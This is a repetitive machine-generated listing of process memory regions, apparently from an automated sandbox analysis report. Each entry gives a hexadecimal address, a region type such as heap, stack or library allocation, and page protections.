page read and write
530B000
trusted library allocation
page execute and read and write
93A000
heap
page read and write
9900000
trusted library allocation
page read and write
7861000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
4EBF000
stack
page read and write
9880000
trusted library allocation
page read and write
5540000
trusted library allocation
page read and write
ECD000
stack
page read and write
9BC0000
trusted library allocation
page read and write
8841000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
178848E0000
heap
page read and write
9C60000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
8945000
trusted library allocation
page read and write
B6A0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
8990000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
2286A484000
heap
page read and write
96B6000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
2BC4C5D0000
trusted library section
page readonly
A6D0000
trusted library allocation
page read and write
B493000
trusted library allocation
page read and write
2BC4C600000
trusted library section
page readonly
12F6000
direct allocation
page read and write
9890000
trusted library allocation
page read and write
96D5000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
5F5E000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
2BC50B60000
trusted library allocation
page read and write
19EEF402000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
7D10000
trusted library allocation
page execute and read and write
98F0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
9C35000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
1085000
trusted library allocation
page read and write
2BC4B43F000
heap
page read and write
7DA0000
trusted library allocation
page read and write
44D8FC000
stack
page read and write
A6A0000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
9700000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
9B85000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
1D5ADFF0000
heap
page read and write
889B000
trusted library allocation
page read and write
139BBECC000
heap
page read and write
98B0000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
9B85000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
9F9ACFF000
stack
page read and write
96B0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
5540000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
C76C000
trusted library allocation
page read and write
1291000
heap
page read and write
9900000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
7D20000
trusted library allocation
page read and write
B700000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
7FD0000
direct allocation
page read and write
88F0000
trusted library allocation
page read and write
9C65000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
7DA5000
trusted library allocation
page read and write
129E000
heap
page read and write
9B42000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
3400000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
1B9B8870000
heap
page read and write
A710000
trusted library allocation
page read and write
BC07000
trusted library allocation
page read and write
139BBEBB000
heap
page read and write
9840000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
90A000
heap
page read and write
44D5FB000
stack
page read and write
9BC0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
2BC50B48000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9AB0000
trusted library allocation
page read and write
A750000
trusted library allocation
page read and write
54B0000
trusted library allocation
page readonly
8010000
direct allocation
page read and write
97B0000
trusted library allocation
page read and write
A82E000
stack
page read and write
A6B0000
trusted library allocation
page read and write
98C2000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
1096000
trusted library allocation
page read and write
9B67000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
2BC4B3D0000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
87B1000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
7D95000
trusted library allocation
page read and write
2BC50EE8000
heap
page read and write
98C0000
trusted library allocation
page read and write
7B20000
heap
page read and write
A710000
trusted library allocation
page read and write
8823000
trusted library allocation
page read and write
17884A59000
heap
page read and write
139BBBE0000
heap
page read and write
2BC50E1E000
heap
page read and write
8910000
trusted library allocation
page read and write
7DA6000
unkown
page read and write
9830000
trusted library allocation
page read and write
9B90000
unkown
page read and write
88C0000
trusted library allocation
page read and write
78E000
stack
page read and write
97B0000
trusted library allocation
page read and write
75FD000
stack
page read and write
A690000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
2BC50CA0000
remote allocation
page read and write
52DD000
trusted library allocation
page execute and read and write
8940000
trusted library allocation
page read and write
1B9B89D0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
7D90000
unkown
page read and write
98D0000
trusted library allocation
page read and write
1E0A9C7D000
heap
page read and write
98C5000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
20A30A78000
heap
page read and write
1E0A9C4D000
heap
page read and write
8930000
unkown
page read and write
7D90000
trusted library allocation
page read and write
20A30B00000
heap
page read and write
87D0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
9BD7000
trusted library allocation
page read and write
7780000
heap
page execute and read and write
BDCD000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
8900000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
886C000
trusted library allocation
page read and write
9F9B0FE000
stack
page read and write
2BC51000000
heap
page read and write
9890000
trusted library allocation
page read and write
7DA5000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
90A000
heap
page read and write
98C1000
trusted library allocation
page read and write
BA4F000
trusted library allocation
page read and write
2BC4BF02000
heap
page read and write
AA6D000
stack
page read and write
9990000
trusted library allocation
page read and write
BDE3000
trusted library allocation
page read and write
20A30A3C000
heap
page read and write
88C0000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
9AE3000
unkown
page read and write
11F0000
heap
page read and write
9BD0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
139BC602000
heap
page read and write
A7EE000
stack
page read and write
8970000
unkown
page read and write
77D0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
9A00000
unkown
page read and write
7D00000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
20A30B02000
heap
page read and write
8930000
unkown
page read and write
17884A02000
heap
page read and write
96F0000
unkown
page read and write
E8E000
stack
page read and write
4CA0000
trusted library allocation
page read and write
4DFC000
stack
page read and write
9B50000
trusted library allocation
page read and write
7D30000
trusted library allocation
page read and write
2BC50E3C000
heap
page read and write
9840000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
5E4E000
trusted library allocation
page read and write
1E0A9C4C000
heap
page read and write
7D00000
trusted library allocation
page read and write
9870000
unkown
page read and write
9BE0000
trusted library allocation
page read and write
4F4D000
stack
page read and write
A695000
trusted library allocation
page read and write
7D2C000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
3521000
heap
page read and write
A740000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page execute and read and write
9BC0000
trusted library allocation
page read and write
2286A46D000
heap
page read and write
9CA0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
9870000
unkown
page read and write
1D5AE067000
heap
page read and write
9C10000
trusted library allocation
page read and write
97B2000
trusted library allocation
page read and write
5B0F000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
2BC4BE02000
heap
page read and write
9B89000
trusted library allocation
page read and write
1E0A9C4E000
heap
page read and write
1D5AE075000
heap
page read and write
98C0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
1B9B8A65000
heap
page read and write
98C0000
trusted library allocation
page read and write
139BBE87000
heap
page read and write
79E0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
1D5AE071000
heap
page read and write
93D000
heap
page read and write
8CE000
stack
page read and write
12F8000
heap
page read and write
8940000
trusted library allocation
page read and write
9C60000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
1092000
trusted library allocation
page read and write
9892000
trusted library allocation
page read and write
17884A64000
heap
page read and write
583E000
stack
page read and write
A770000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
2BC50E63000
heap
page read and write
8940000
trusted library allocation
page read and write
9BFC000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
2BC4C620000
trusted library section
page readonly
9CA0000
trusted library allocation
page read and write
139BBE68000
heap
page read and write
9BC0000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
2286A45C000
heap
page read and write
7AB0000
trusted library allocation
page read and write
1050000
trusted library allocation
page read and write
1297000
heap
page read and write
98A0000
trusted library allocation
page read and write
9C30000
unkown
page read and write
1130000
heap
page read and write
24BED690000
remote allocation
page read and write
5540000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
99A000
heap
page read and write
A690000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
89A5000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
128B000
heap
page read and write
A660000
trusted library allocation
page read and write
17884B00000
heap
page read and write
8960000
trusted library allocation
page read and write
A3233FF000
stack
page read and write
96E0000
trusted library allocation
page read and write
9C90000
unkown
page read and write
9870000
trusted library allocation
page read and write
5370000
heap
page read and write
9B43000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
77A0000
trusted library allocation
page execute and read and write
9BB0000
trusted library allocation
page read and write
8990000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
BAE5000
trusted library allocation
page read and write
7D90000
unkown
page read and write
5C76000
direct allocation
page read and write
9C5E000
stack
page read and write
9980000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
2286A477000
heap
page read and write
61F8C7C000
stack
page read and write
7D9D000
trusted library allocation
page read and write
B640000
trusted library allocation
page read and write
1D5AE068000
heap
page read and write
7740000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
B479000
trusted library allocation
page read and write
7753000
trusted library allocation
page read and write
2BC4BE00000
heap
page read and write
34C8000
heap
page read and write
9AA0000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
1B9B8A7E000
heap
page read and write
A4E000
stack
page read and write
2BC50EF5000
heap
page read and write
890000
heap
page read and write
9B40000
trusted library allocation
page read and write
BE2E000
trusted library allocation
page read and write
5F827FC000
stack
page read and write
A7B0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
889F000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
5BEE000
stack
page read and write
9820000
trusted library allocation
page read and write
2286A444000
heap
page read and write
9B40000
trusted library allocation
page read and write
9A3C000
stack
page read and write
9BA0000
unkown
page read and write
F5CCEFB000
stack
page read and write
F5CD4FF000
stack
page read and write
1E0A9C70000
heap
page read and write
A680000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
2BC50B80000
trusted library allocation
page read and write
87D6000
trusted library allocation
page read and write
96E5000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
7CCC000
stack
page read and write
79A0000
trusted library allocation
page read and write
2286A42A000
heap
page read and write
B482000
trusted library allocation
page read and write
52E3000
trusted library allocation
page read and write
502E000
stack
page read and write
9890000
trusted library allocation
page read and write
88C7000
trusted library allocation
page read and write
9B20000
unkown
page read and write
A6A0000
trusted library allocation
page read and write
3420000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
5BD0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
79F6000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
24BECDC0000
heap
page read and write
34C8000
heap
page read and write
9740000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
300000
trusted library allocation
page read and write
800F000
direct allocation
page read and write
8910000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
59EE000
stack
page read and write
7DA5000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
5C70000
direct allocation
page read and write
88E0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
19EEDA00000
heap
page read and write
7D40000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
87C0000
trusted library allocation
page read and write
20A30A78000
heap
page read and write
2BC4B4FB000
heap
page read and write
7680000
trusted library allocation
page execute and read and write
2BC4C990000
trusted library allocation
page read and write
892000
heap
page read and write
9BD0000
trusted library allocation
page read and write
63C2CFE000
stack
page read and write
8920000
trusted library allocation
page execute and read and write
A322AEB000
stack
page read and write
BDEB000
trusted library allocation
page read and write
995000
heap
page read and write
2BC4C4F0000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
BABA000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
9970000
trusted library allocation
page read and write
20A30890000
heap
page read and write
9A80000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
521F000
stack
page read and write
7770000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
9B70000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
7775000
trusted library allocation
page read and write
4D20000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
8911000
trusted library allocation
page read and write
4E3B000
stack
page read and write
9880000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
12A0000
heap
page read and write
2BC4BF18000
heap
page read and write
87D6000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
BE8B000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
139BBEC2000
heap
page read and write
7D90000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
87B0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
2286A47E000
heap
page read and write
9730000
trusted library allocation
page read and write
44D77E000
stack
page read and write
98F0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
10C3000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
52FB000
stack
page read and write
9B40000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
87B6000
trusted library allocation
page read and write
19EEDA63000
heap
page read and write
9890000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
2286A442000
heap
page read and write
8980000
unkown
page read and write
76A0000
trusted library allocation
page read and write
12EA000
heap
page read and write
7630000
heap
page read and write
7D90000
unkown
page read and write
A663000
trusted library allocation
page read and write
F5CCF7E000
stack
page read and write
992F000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
1D5AE890000
trusted library allocation
page read and write
9680000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
1E0A9C56000
heap
page read and write
8898000
trusted library allocation
page read and write
3ADFB7B000
stack
page read and write
59C6000
trusted library allocation
page read and write
940000
heap
page read and write
890000
heap
page read and write
A322FFD000
stack
page read and write
1D5AE013000
heap
page read and write
89A0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
5EA1000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
5B4E000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
9870000
unkown
page read and write
9A82000
trusted library allocation
page read and write
79F8000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
A6F0000
unkown
page readonly
1B9B8B13000
heap
page read and write
7DA0000
trusted library allocation
page read and write
967000
heap
page read and write
7DA0000
unkown
page read and write
9BA0000
trusted library allocation
page read and write
1B9B8A00000
heap
page read and write
2286A43A000
heap
page read and write
9C74000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
34C8000
heap
page read and write
3410000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
887B000
stack
page read and write
9BF0000
trusted library allocation
page read and write
1E0A9B00000
heap
page read and write
98E0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
1060000
remote allocation
page read and write
B9EB000
trusted library allocation
page read and write
17884A13000
heap
page read and write
7DA0000
unkown
page read and write
1093000
trusted library allocation
page read and write
9870000
unkown
page read and write
8968000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
127A000
heap
page read and write
1096000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
B696000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
139BBD40000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
9890000
unkown
page read and write
52F6000
trusted library allocation
page execute and read and write
B670000
trusted library allocation
page read and write
1291000
heap
page read and write
17884A3C000
heap
page read and write
F5CD1FF000
stack
page read and write
9880000
trusted library allocation
page execute and read and write
5CB3000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
2286A502000
heap
page read and write
44DA7B000
stack
page read and write
88E0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
A780000
trusted library allocation
page read and write
989B000
trusted library allocation
page read and write
9987000
trusted library allocation
page read and write
7413477000
stack
page read and write
A6A0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
63C30FF000
stack
page read and write
7CE8000
trusted library allocation
page read and write
1D5ADF80000
heap
page read and write
9820000
trusted library allocation
page read and write
24BECDF0000
trusted library allocation
page read and write
BA92000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
5F826FD000
stack
page read and write
7DA7000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
2BC50A20000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
A6B7000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
9980000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
88D0000
direct allocation
page read and write
19EEDA3D000
heap
page read and write
79A0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
7DA0000
unkown
page read and write
17884B02000
heap
page read and write
A680000
trusted library allocation
page read and write
9824000
trusted library allocation
page read and write
96AE000
stack
page read and write
98B0000
trusted library allocation
page read and write
5CAB000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
BA47000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
B751000
trusted library allocation
page read and write
2BC4BF18000
heap
page read and write
7DA0000
trusted library allocation
page read and write
882F000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
A720000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
88CE000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
BC17000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
19EEDA02000
heap
page read and write
77C0000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
1B9B8B08000
heap
page read and write
2BC4C971000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
2BC50C60000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
988000
heap
page read and write
7D9E000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
BC0000
heap
page read and write
139BC714000
heap
page read and write
9720000
trusted library allocation
page read and write
98A0000
trusted library allocation
page execute and read and write
98D0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9B85000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
20A30A8C000
heap
page read and write
7D00000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
3526000
heap
page read and write
4F30000
heap
page read and write
A700000
trusted library allocation
page read and write
2BC50B70000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page execute and read and write
9830000
trusted library allocation
page read and write
96B5000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
1E0A9A90000
heap
page read and write
9850000
trusted library allocation
page read and write
97B3000
trusted library allocation
page read and write
8985000
unkown
page read and write
97A0000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
BAFC000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
5B7E000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
20A30A84000
heap
page read and write
65D2000
trusted library allocation
page read and write
9BA0000
unkown
page read and write
5BC0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
5480000
heap
page read and write
2286A47A000
heap
page read and write
7D90000
trusted library allocation
page execute and read and write
54AF000
stack
page read and write
9718000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
5290000
heap
page read and write
9BE0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
63C32FD000
stack
page read and write
357E000
stack
page read and write
A6D0000
trusted library allocation
page read and write
5CB0000
heap
page read and write
98A0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
7766000
trusted library allocation
page read and write
9A6000
heap
page read and write
7DA0000
trusted library allocation
page read and write
8935000
trusted library allocation
page read and write
BD0000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
390000
remote allocation
page read and write
9B40000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
96F5000
unkown
page read and write
11DF000
stack
page read and write
9B40000
trusted library allocation
page read and write
2286A445000
heap
page read and write
7B10000
heap
page read and write
A6F0000
trusted library allocation
page read and write
1E0A9C00000
heap
page read and write
44D1DC000
stack
page read and write
19EED9F0000
trusted library allocation
page read and write
AAAD000
stack
page read and write
9821000
trusted library allocation
page read and write
52F0000
trusted library allocation
page read and write
430000
heap
page read and write
10C5000
trusted library allocation
page read and write
61F8B7F000
stack
page read and write
9BA0000
trusted library allocation
page read and write
B487000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
9F9AEF7000
stack
page read and write
7720000
trusted library allocation
page read and write
4D0000
remote allocation
page read and write
9890000
trusted library allocation
page read and write
19EED870000
heap
page read and write
A680000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
5BE8000
trusted library allocation
page read and write
52B0000
trusted library section
page read and write
97B0000
trusted library allocation
page read and write
9B82000
trusted library allocation
page read and write
2BC50E49000
heap
page read and write
A6C0000
trusted library allocation
page read and write
AA2E000
stack
page read and write
9870000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
C8D000
heap
page read and write
98C0000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
7D99000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
89C000
heap
page read and write
7D20000
trusted library allocation
page read and write
3534000
heap
page read and write
2BC50B84000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
65F2000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
139BBF02000
heap
page read and write
9890000
trusted library allocation
page read and write
20A30B13000
heap
page read and write
390000
remote allocation
page read and write
9C60000
trusted library allocation
page read and write
24BECE00000
heap
page read and write
9ADE000
stack
page read and write
941000
heap
page read and write
8930000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
61F8E7F000
stack
page read and write
8970000
trusted library allocation
page read and write
8940000
unkown
page read and write
9890000
trusted library allocation
page read and write
5F8267E000
stack
page read and write
7760000
trusted library allocation
page read and write
2BC50CA0000
remote allocation
page read and write
940000
heap
page read and write
A86E000
stack
page read and write
9BC0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
1E0A9C50000
heap
page read and write
9BF0000
trusted library allocation
page read and write
139BBEE1000
heap
page read and write
9B20000
trusted library allocation
page read and write
1B9B8A65000
heap
page read and write
8980000
trusted library allocation
page read and write
44DD7D000
stack
page read and write
7D90000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
139BBF13000
heap
page read and write
98C0000
trusted library allocation
page read and write
12C2000
heap
page read and write
96D0000
trusted library allocation
page read and write
2286A474000
heap
page read and write
7D95000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
8A6D000
stack
page read and write
9890000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
4D0000
remote allocation
page read and write
BE40000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
93B000
heap
page read and write
7DA0000
trusted library allocation
page read and write
99A000
heap
page read and write
8910000
trusted library allocation
page read and write
2BC4B478000
heap
page read and write
9B30000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
348B000
heap
page read and write
B9E3000
trusted library allocation
page read and write
2BC50C70000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
3327000
heap
page read and write
8937000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
3527000
heap
page read and write
A700000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
2BC4B340000
heap
page read and write
63C2E7E000
stack
page read and write
9710000
unkown
page read and write
7DA5000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
87D6000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
63C297C000
stack
page read and write
8940000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
2BC50B4E000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
There are 2747 hidden memdumps, click here to show them.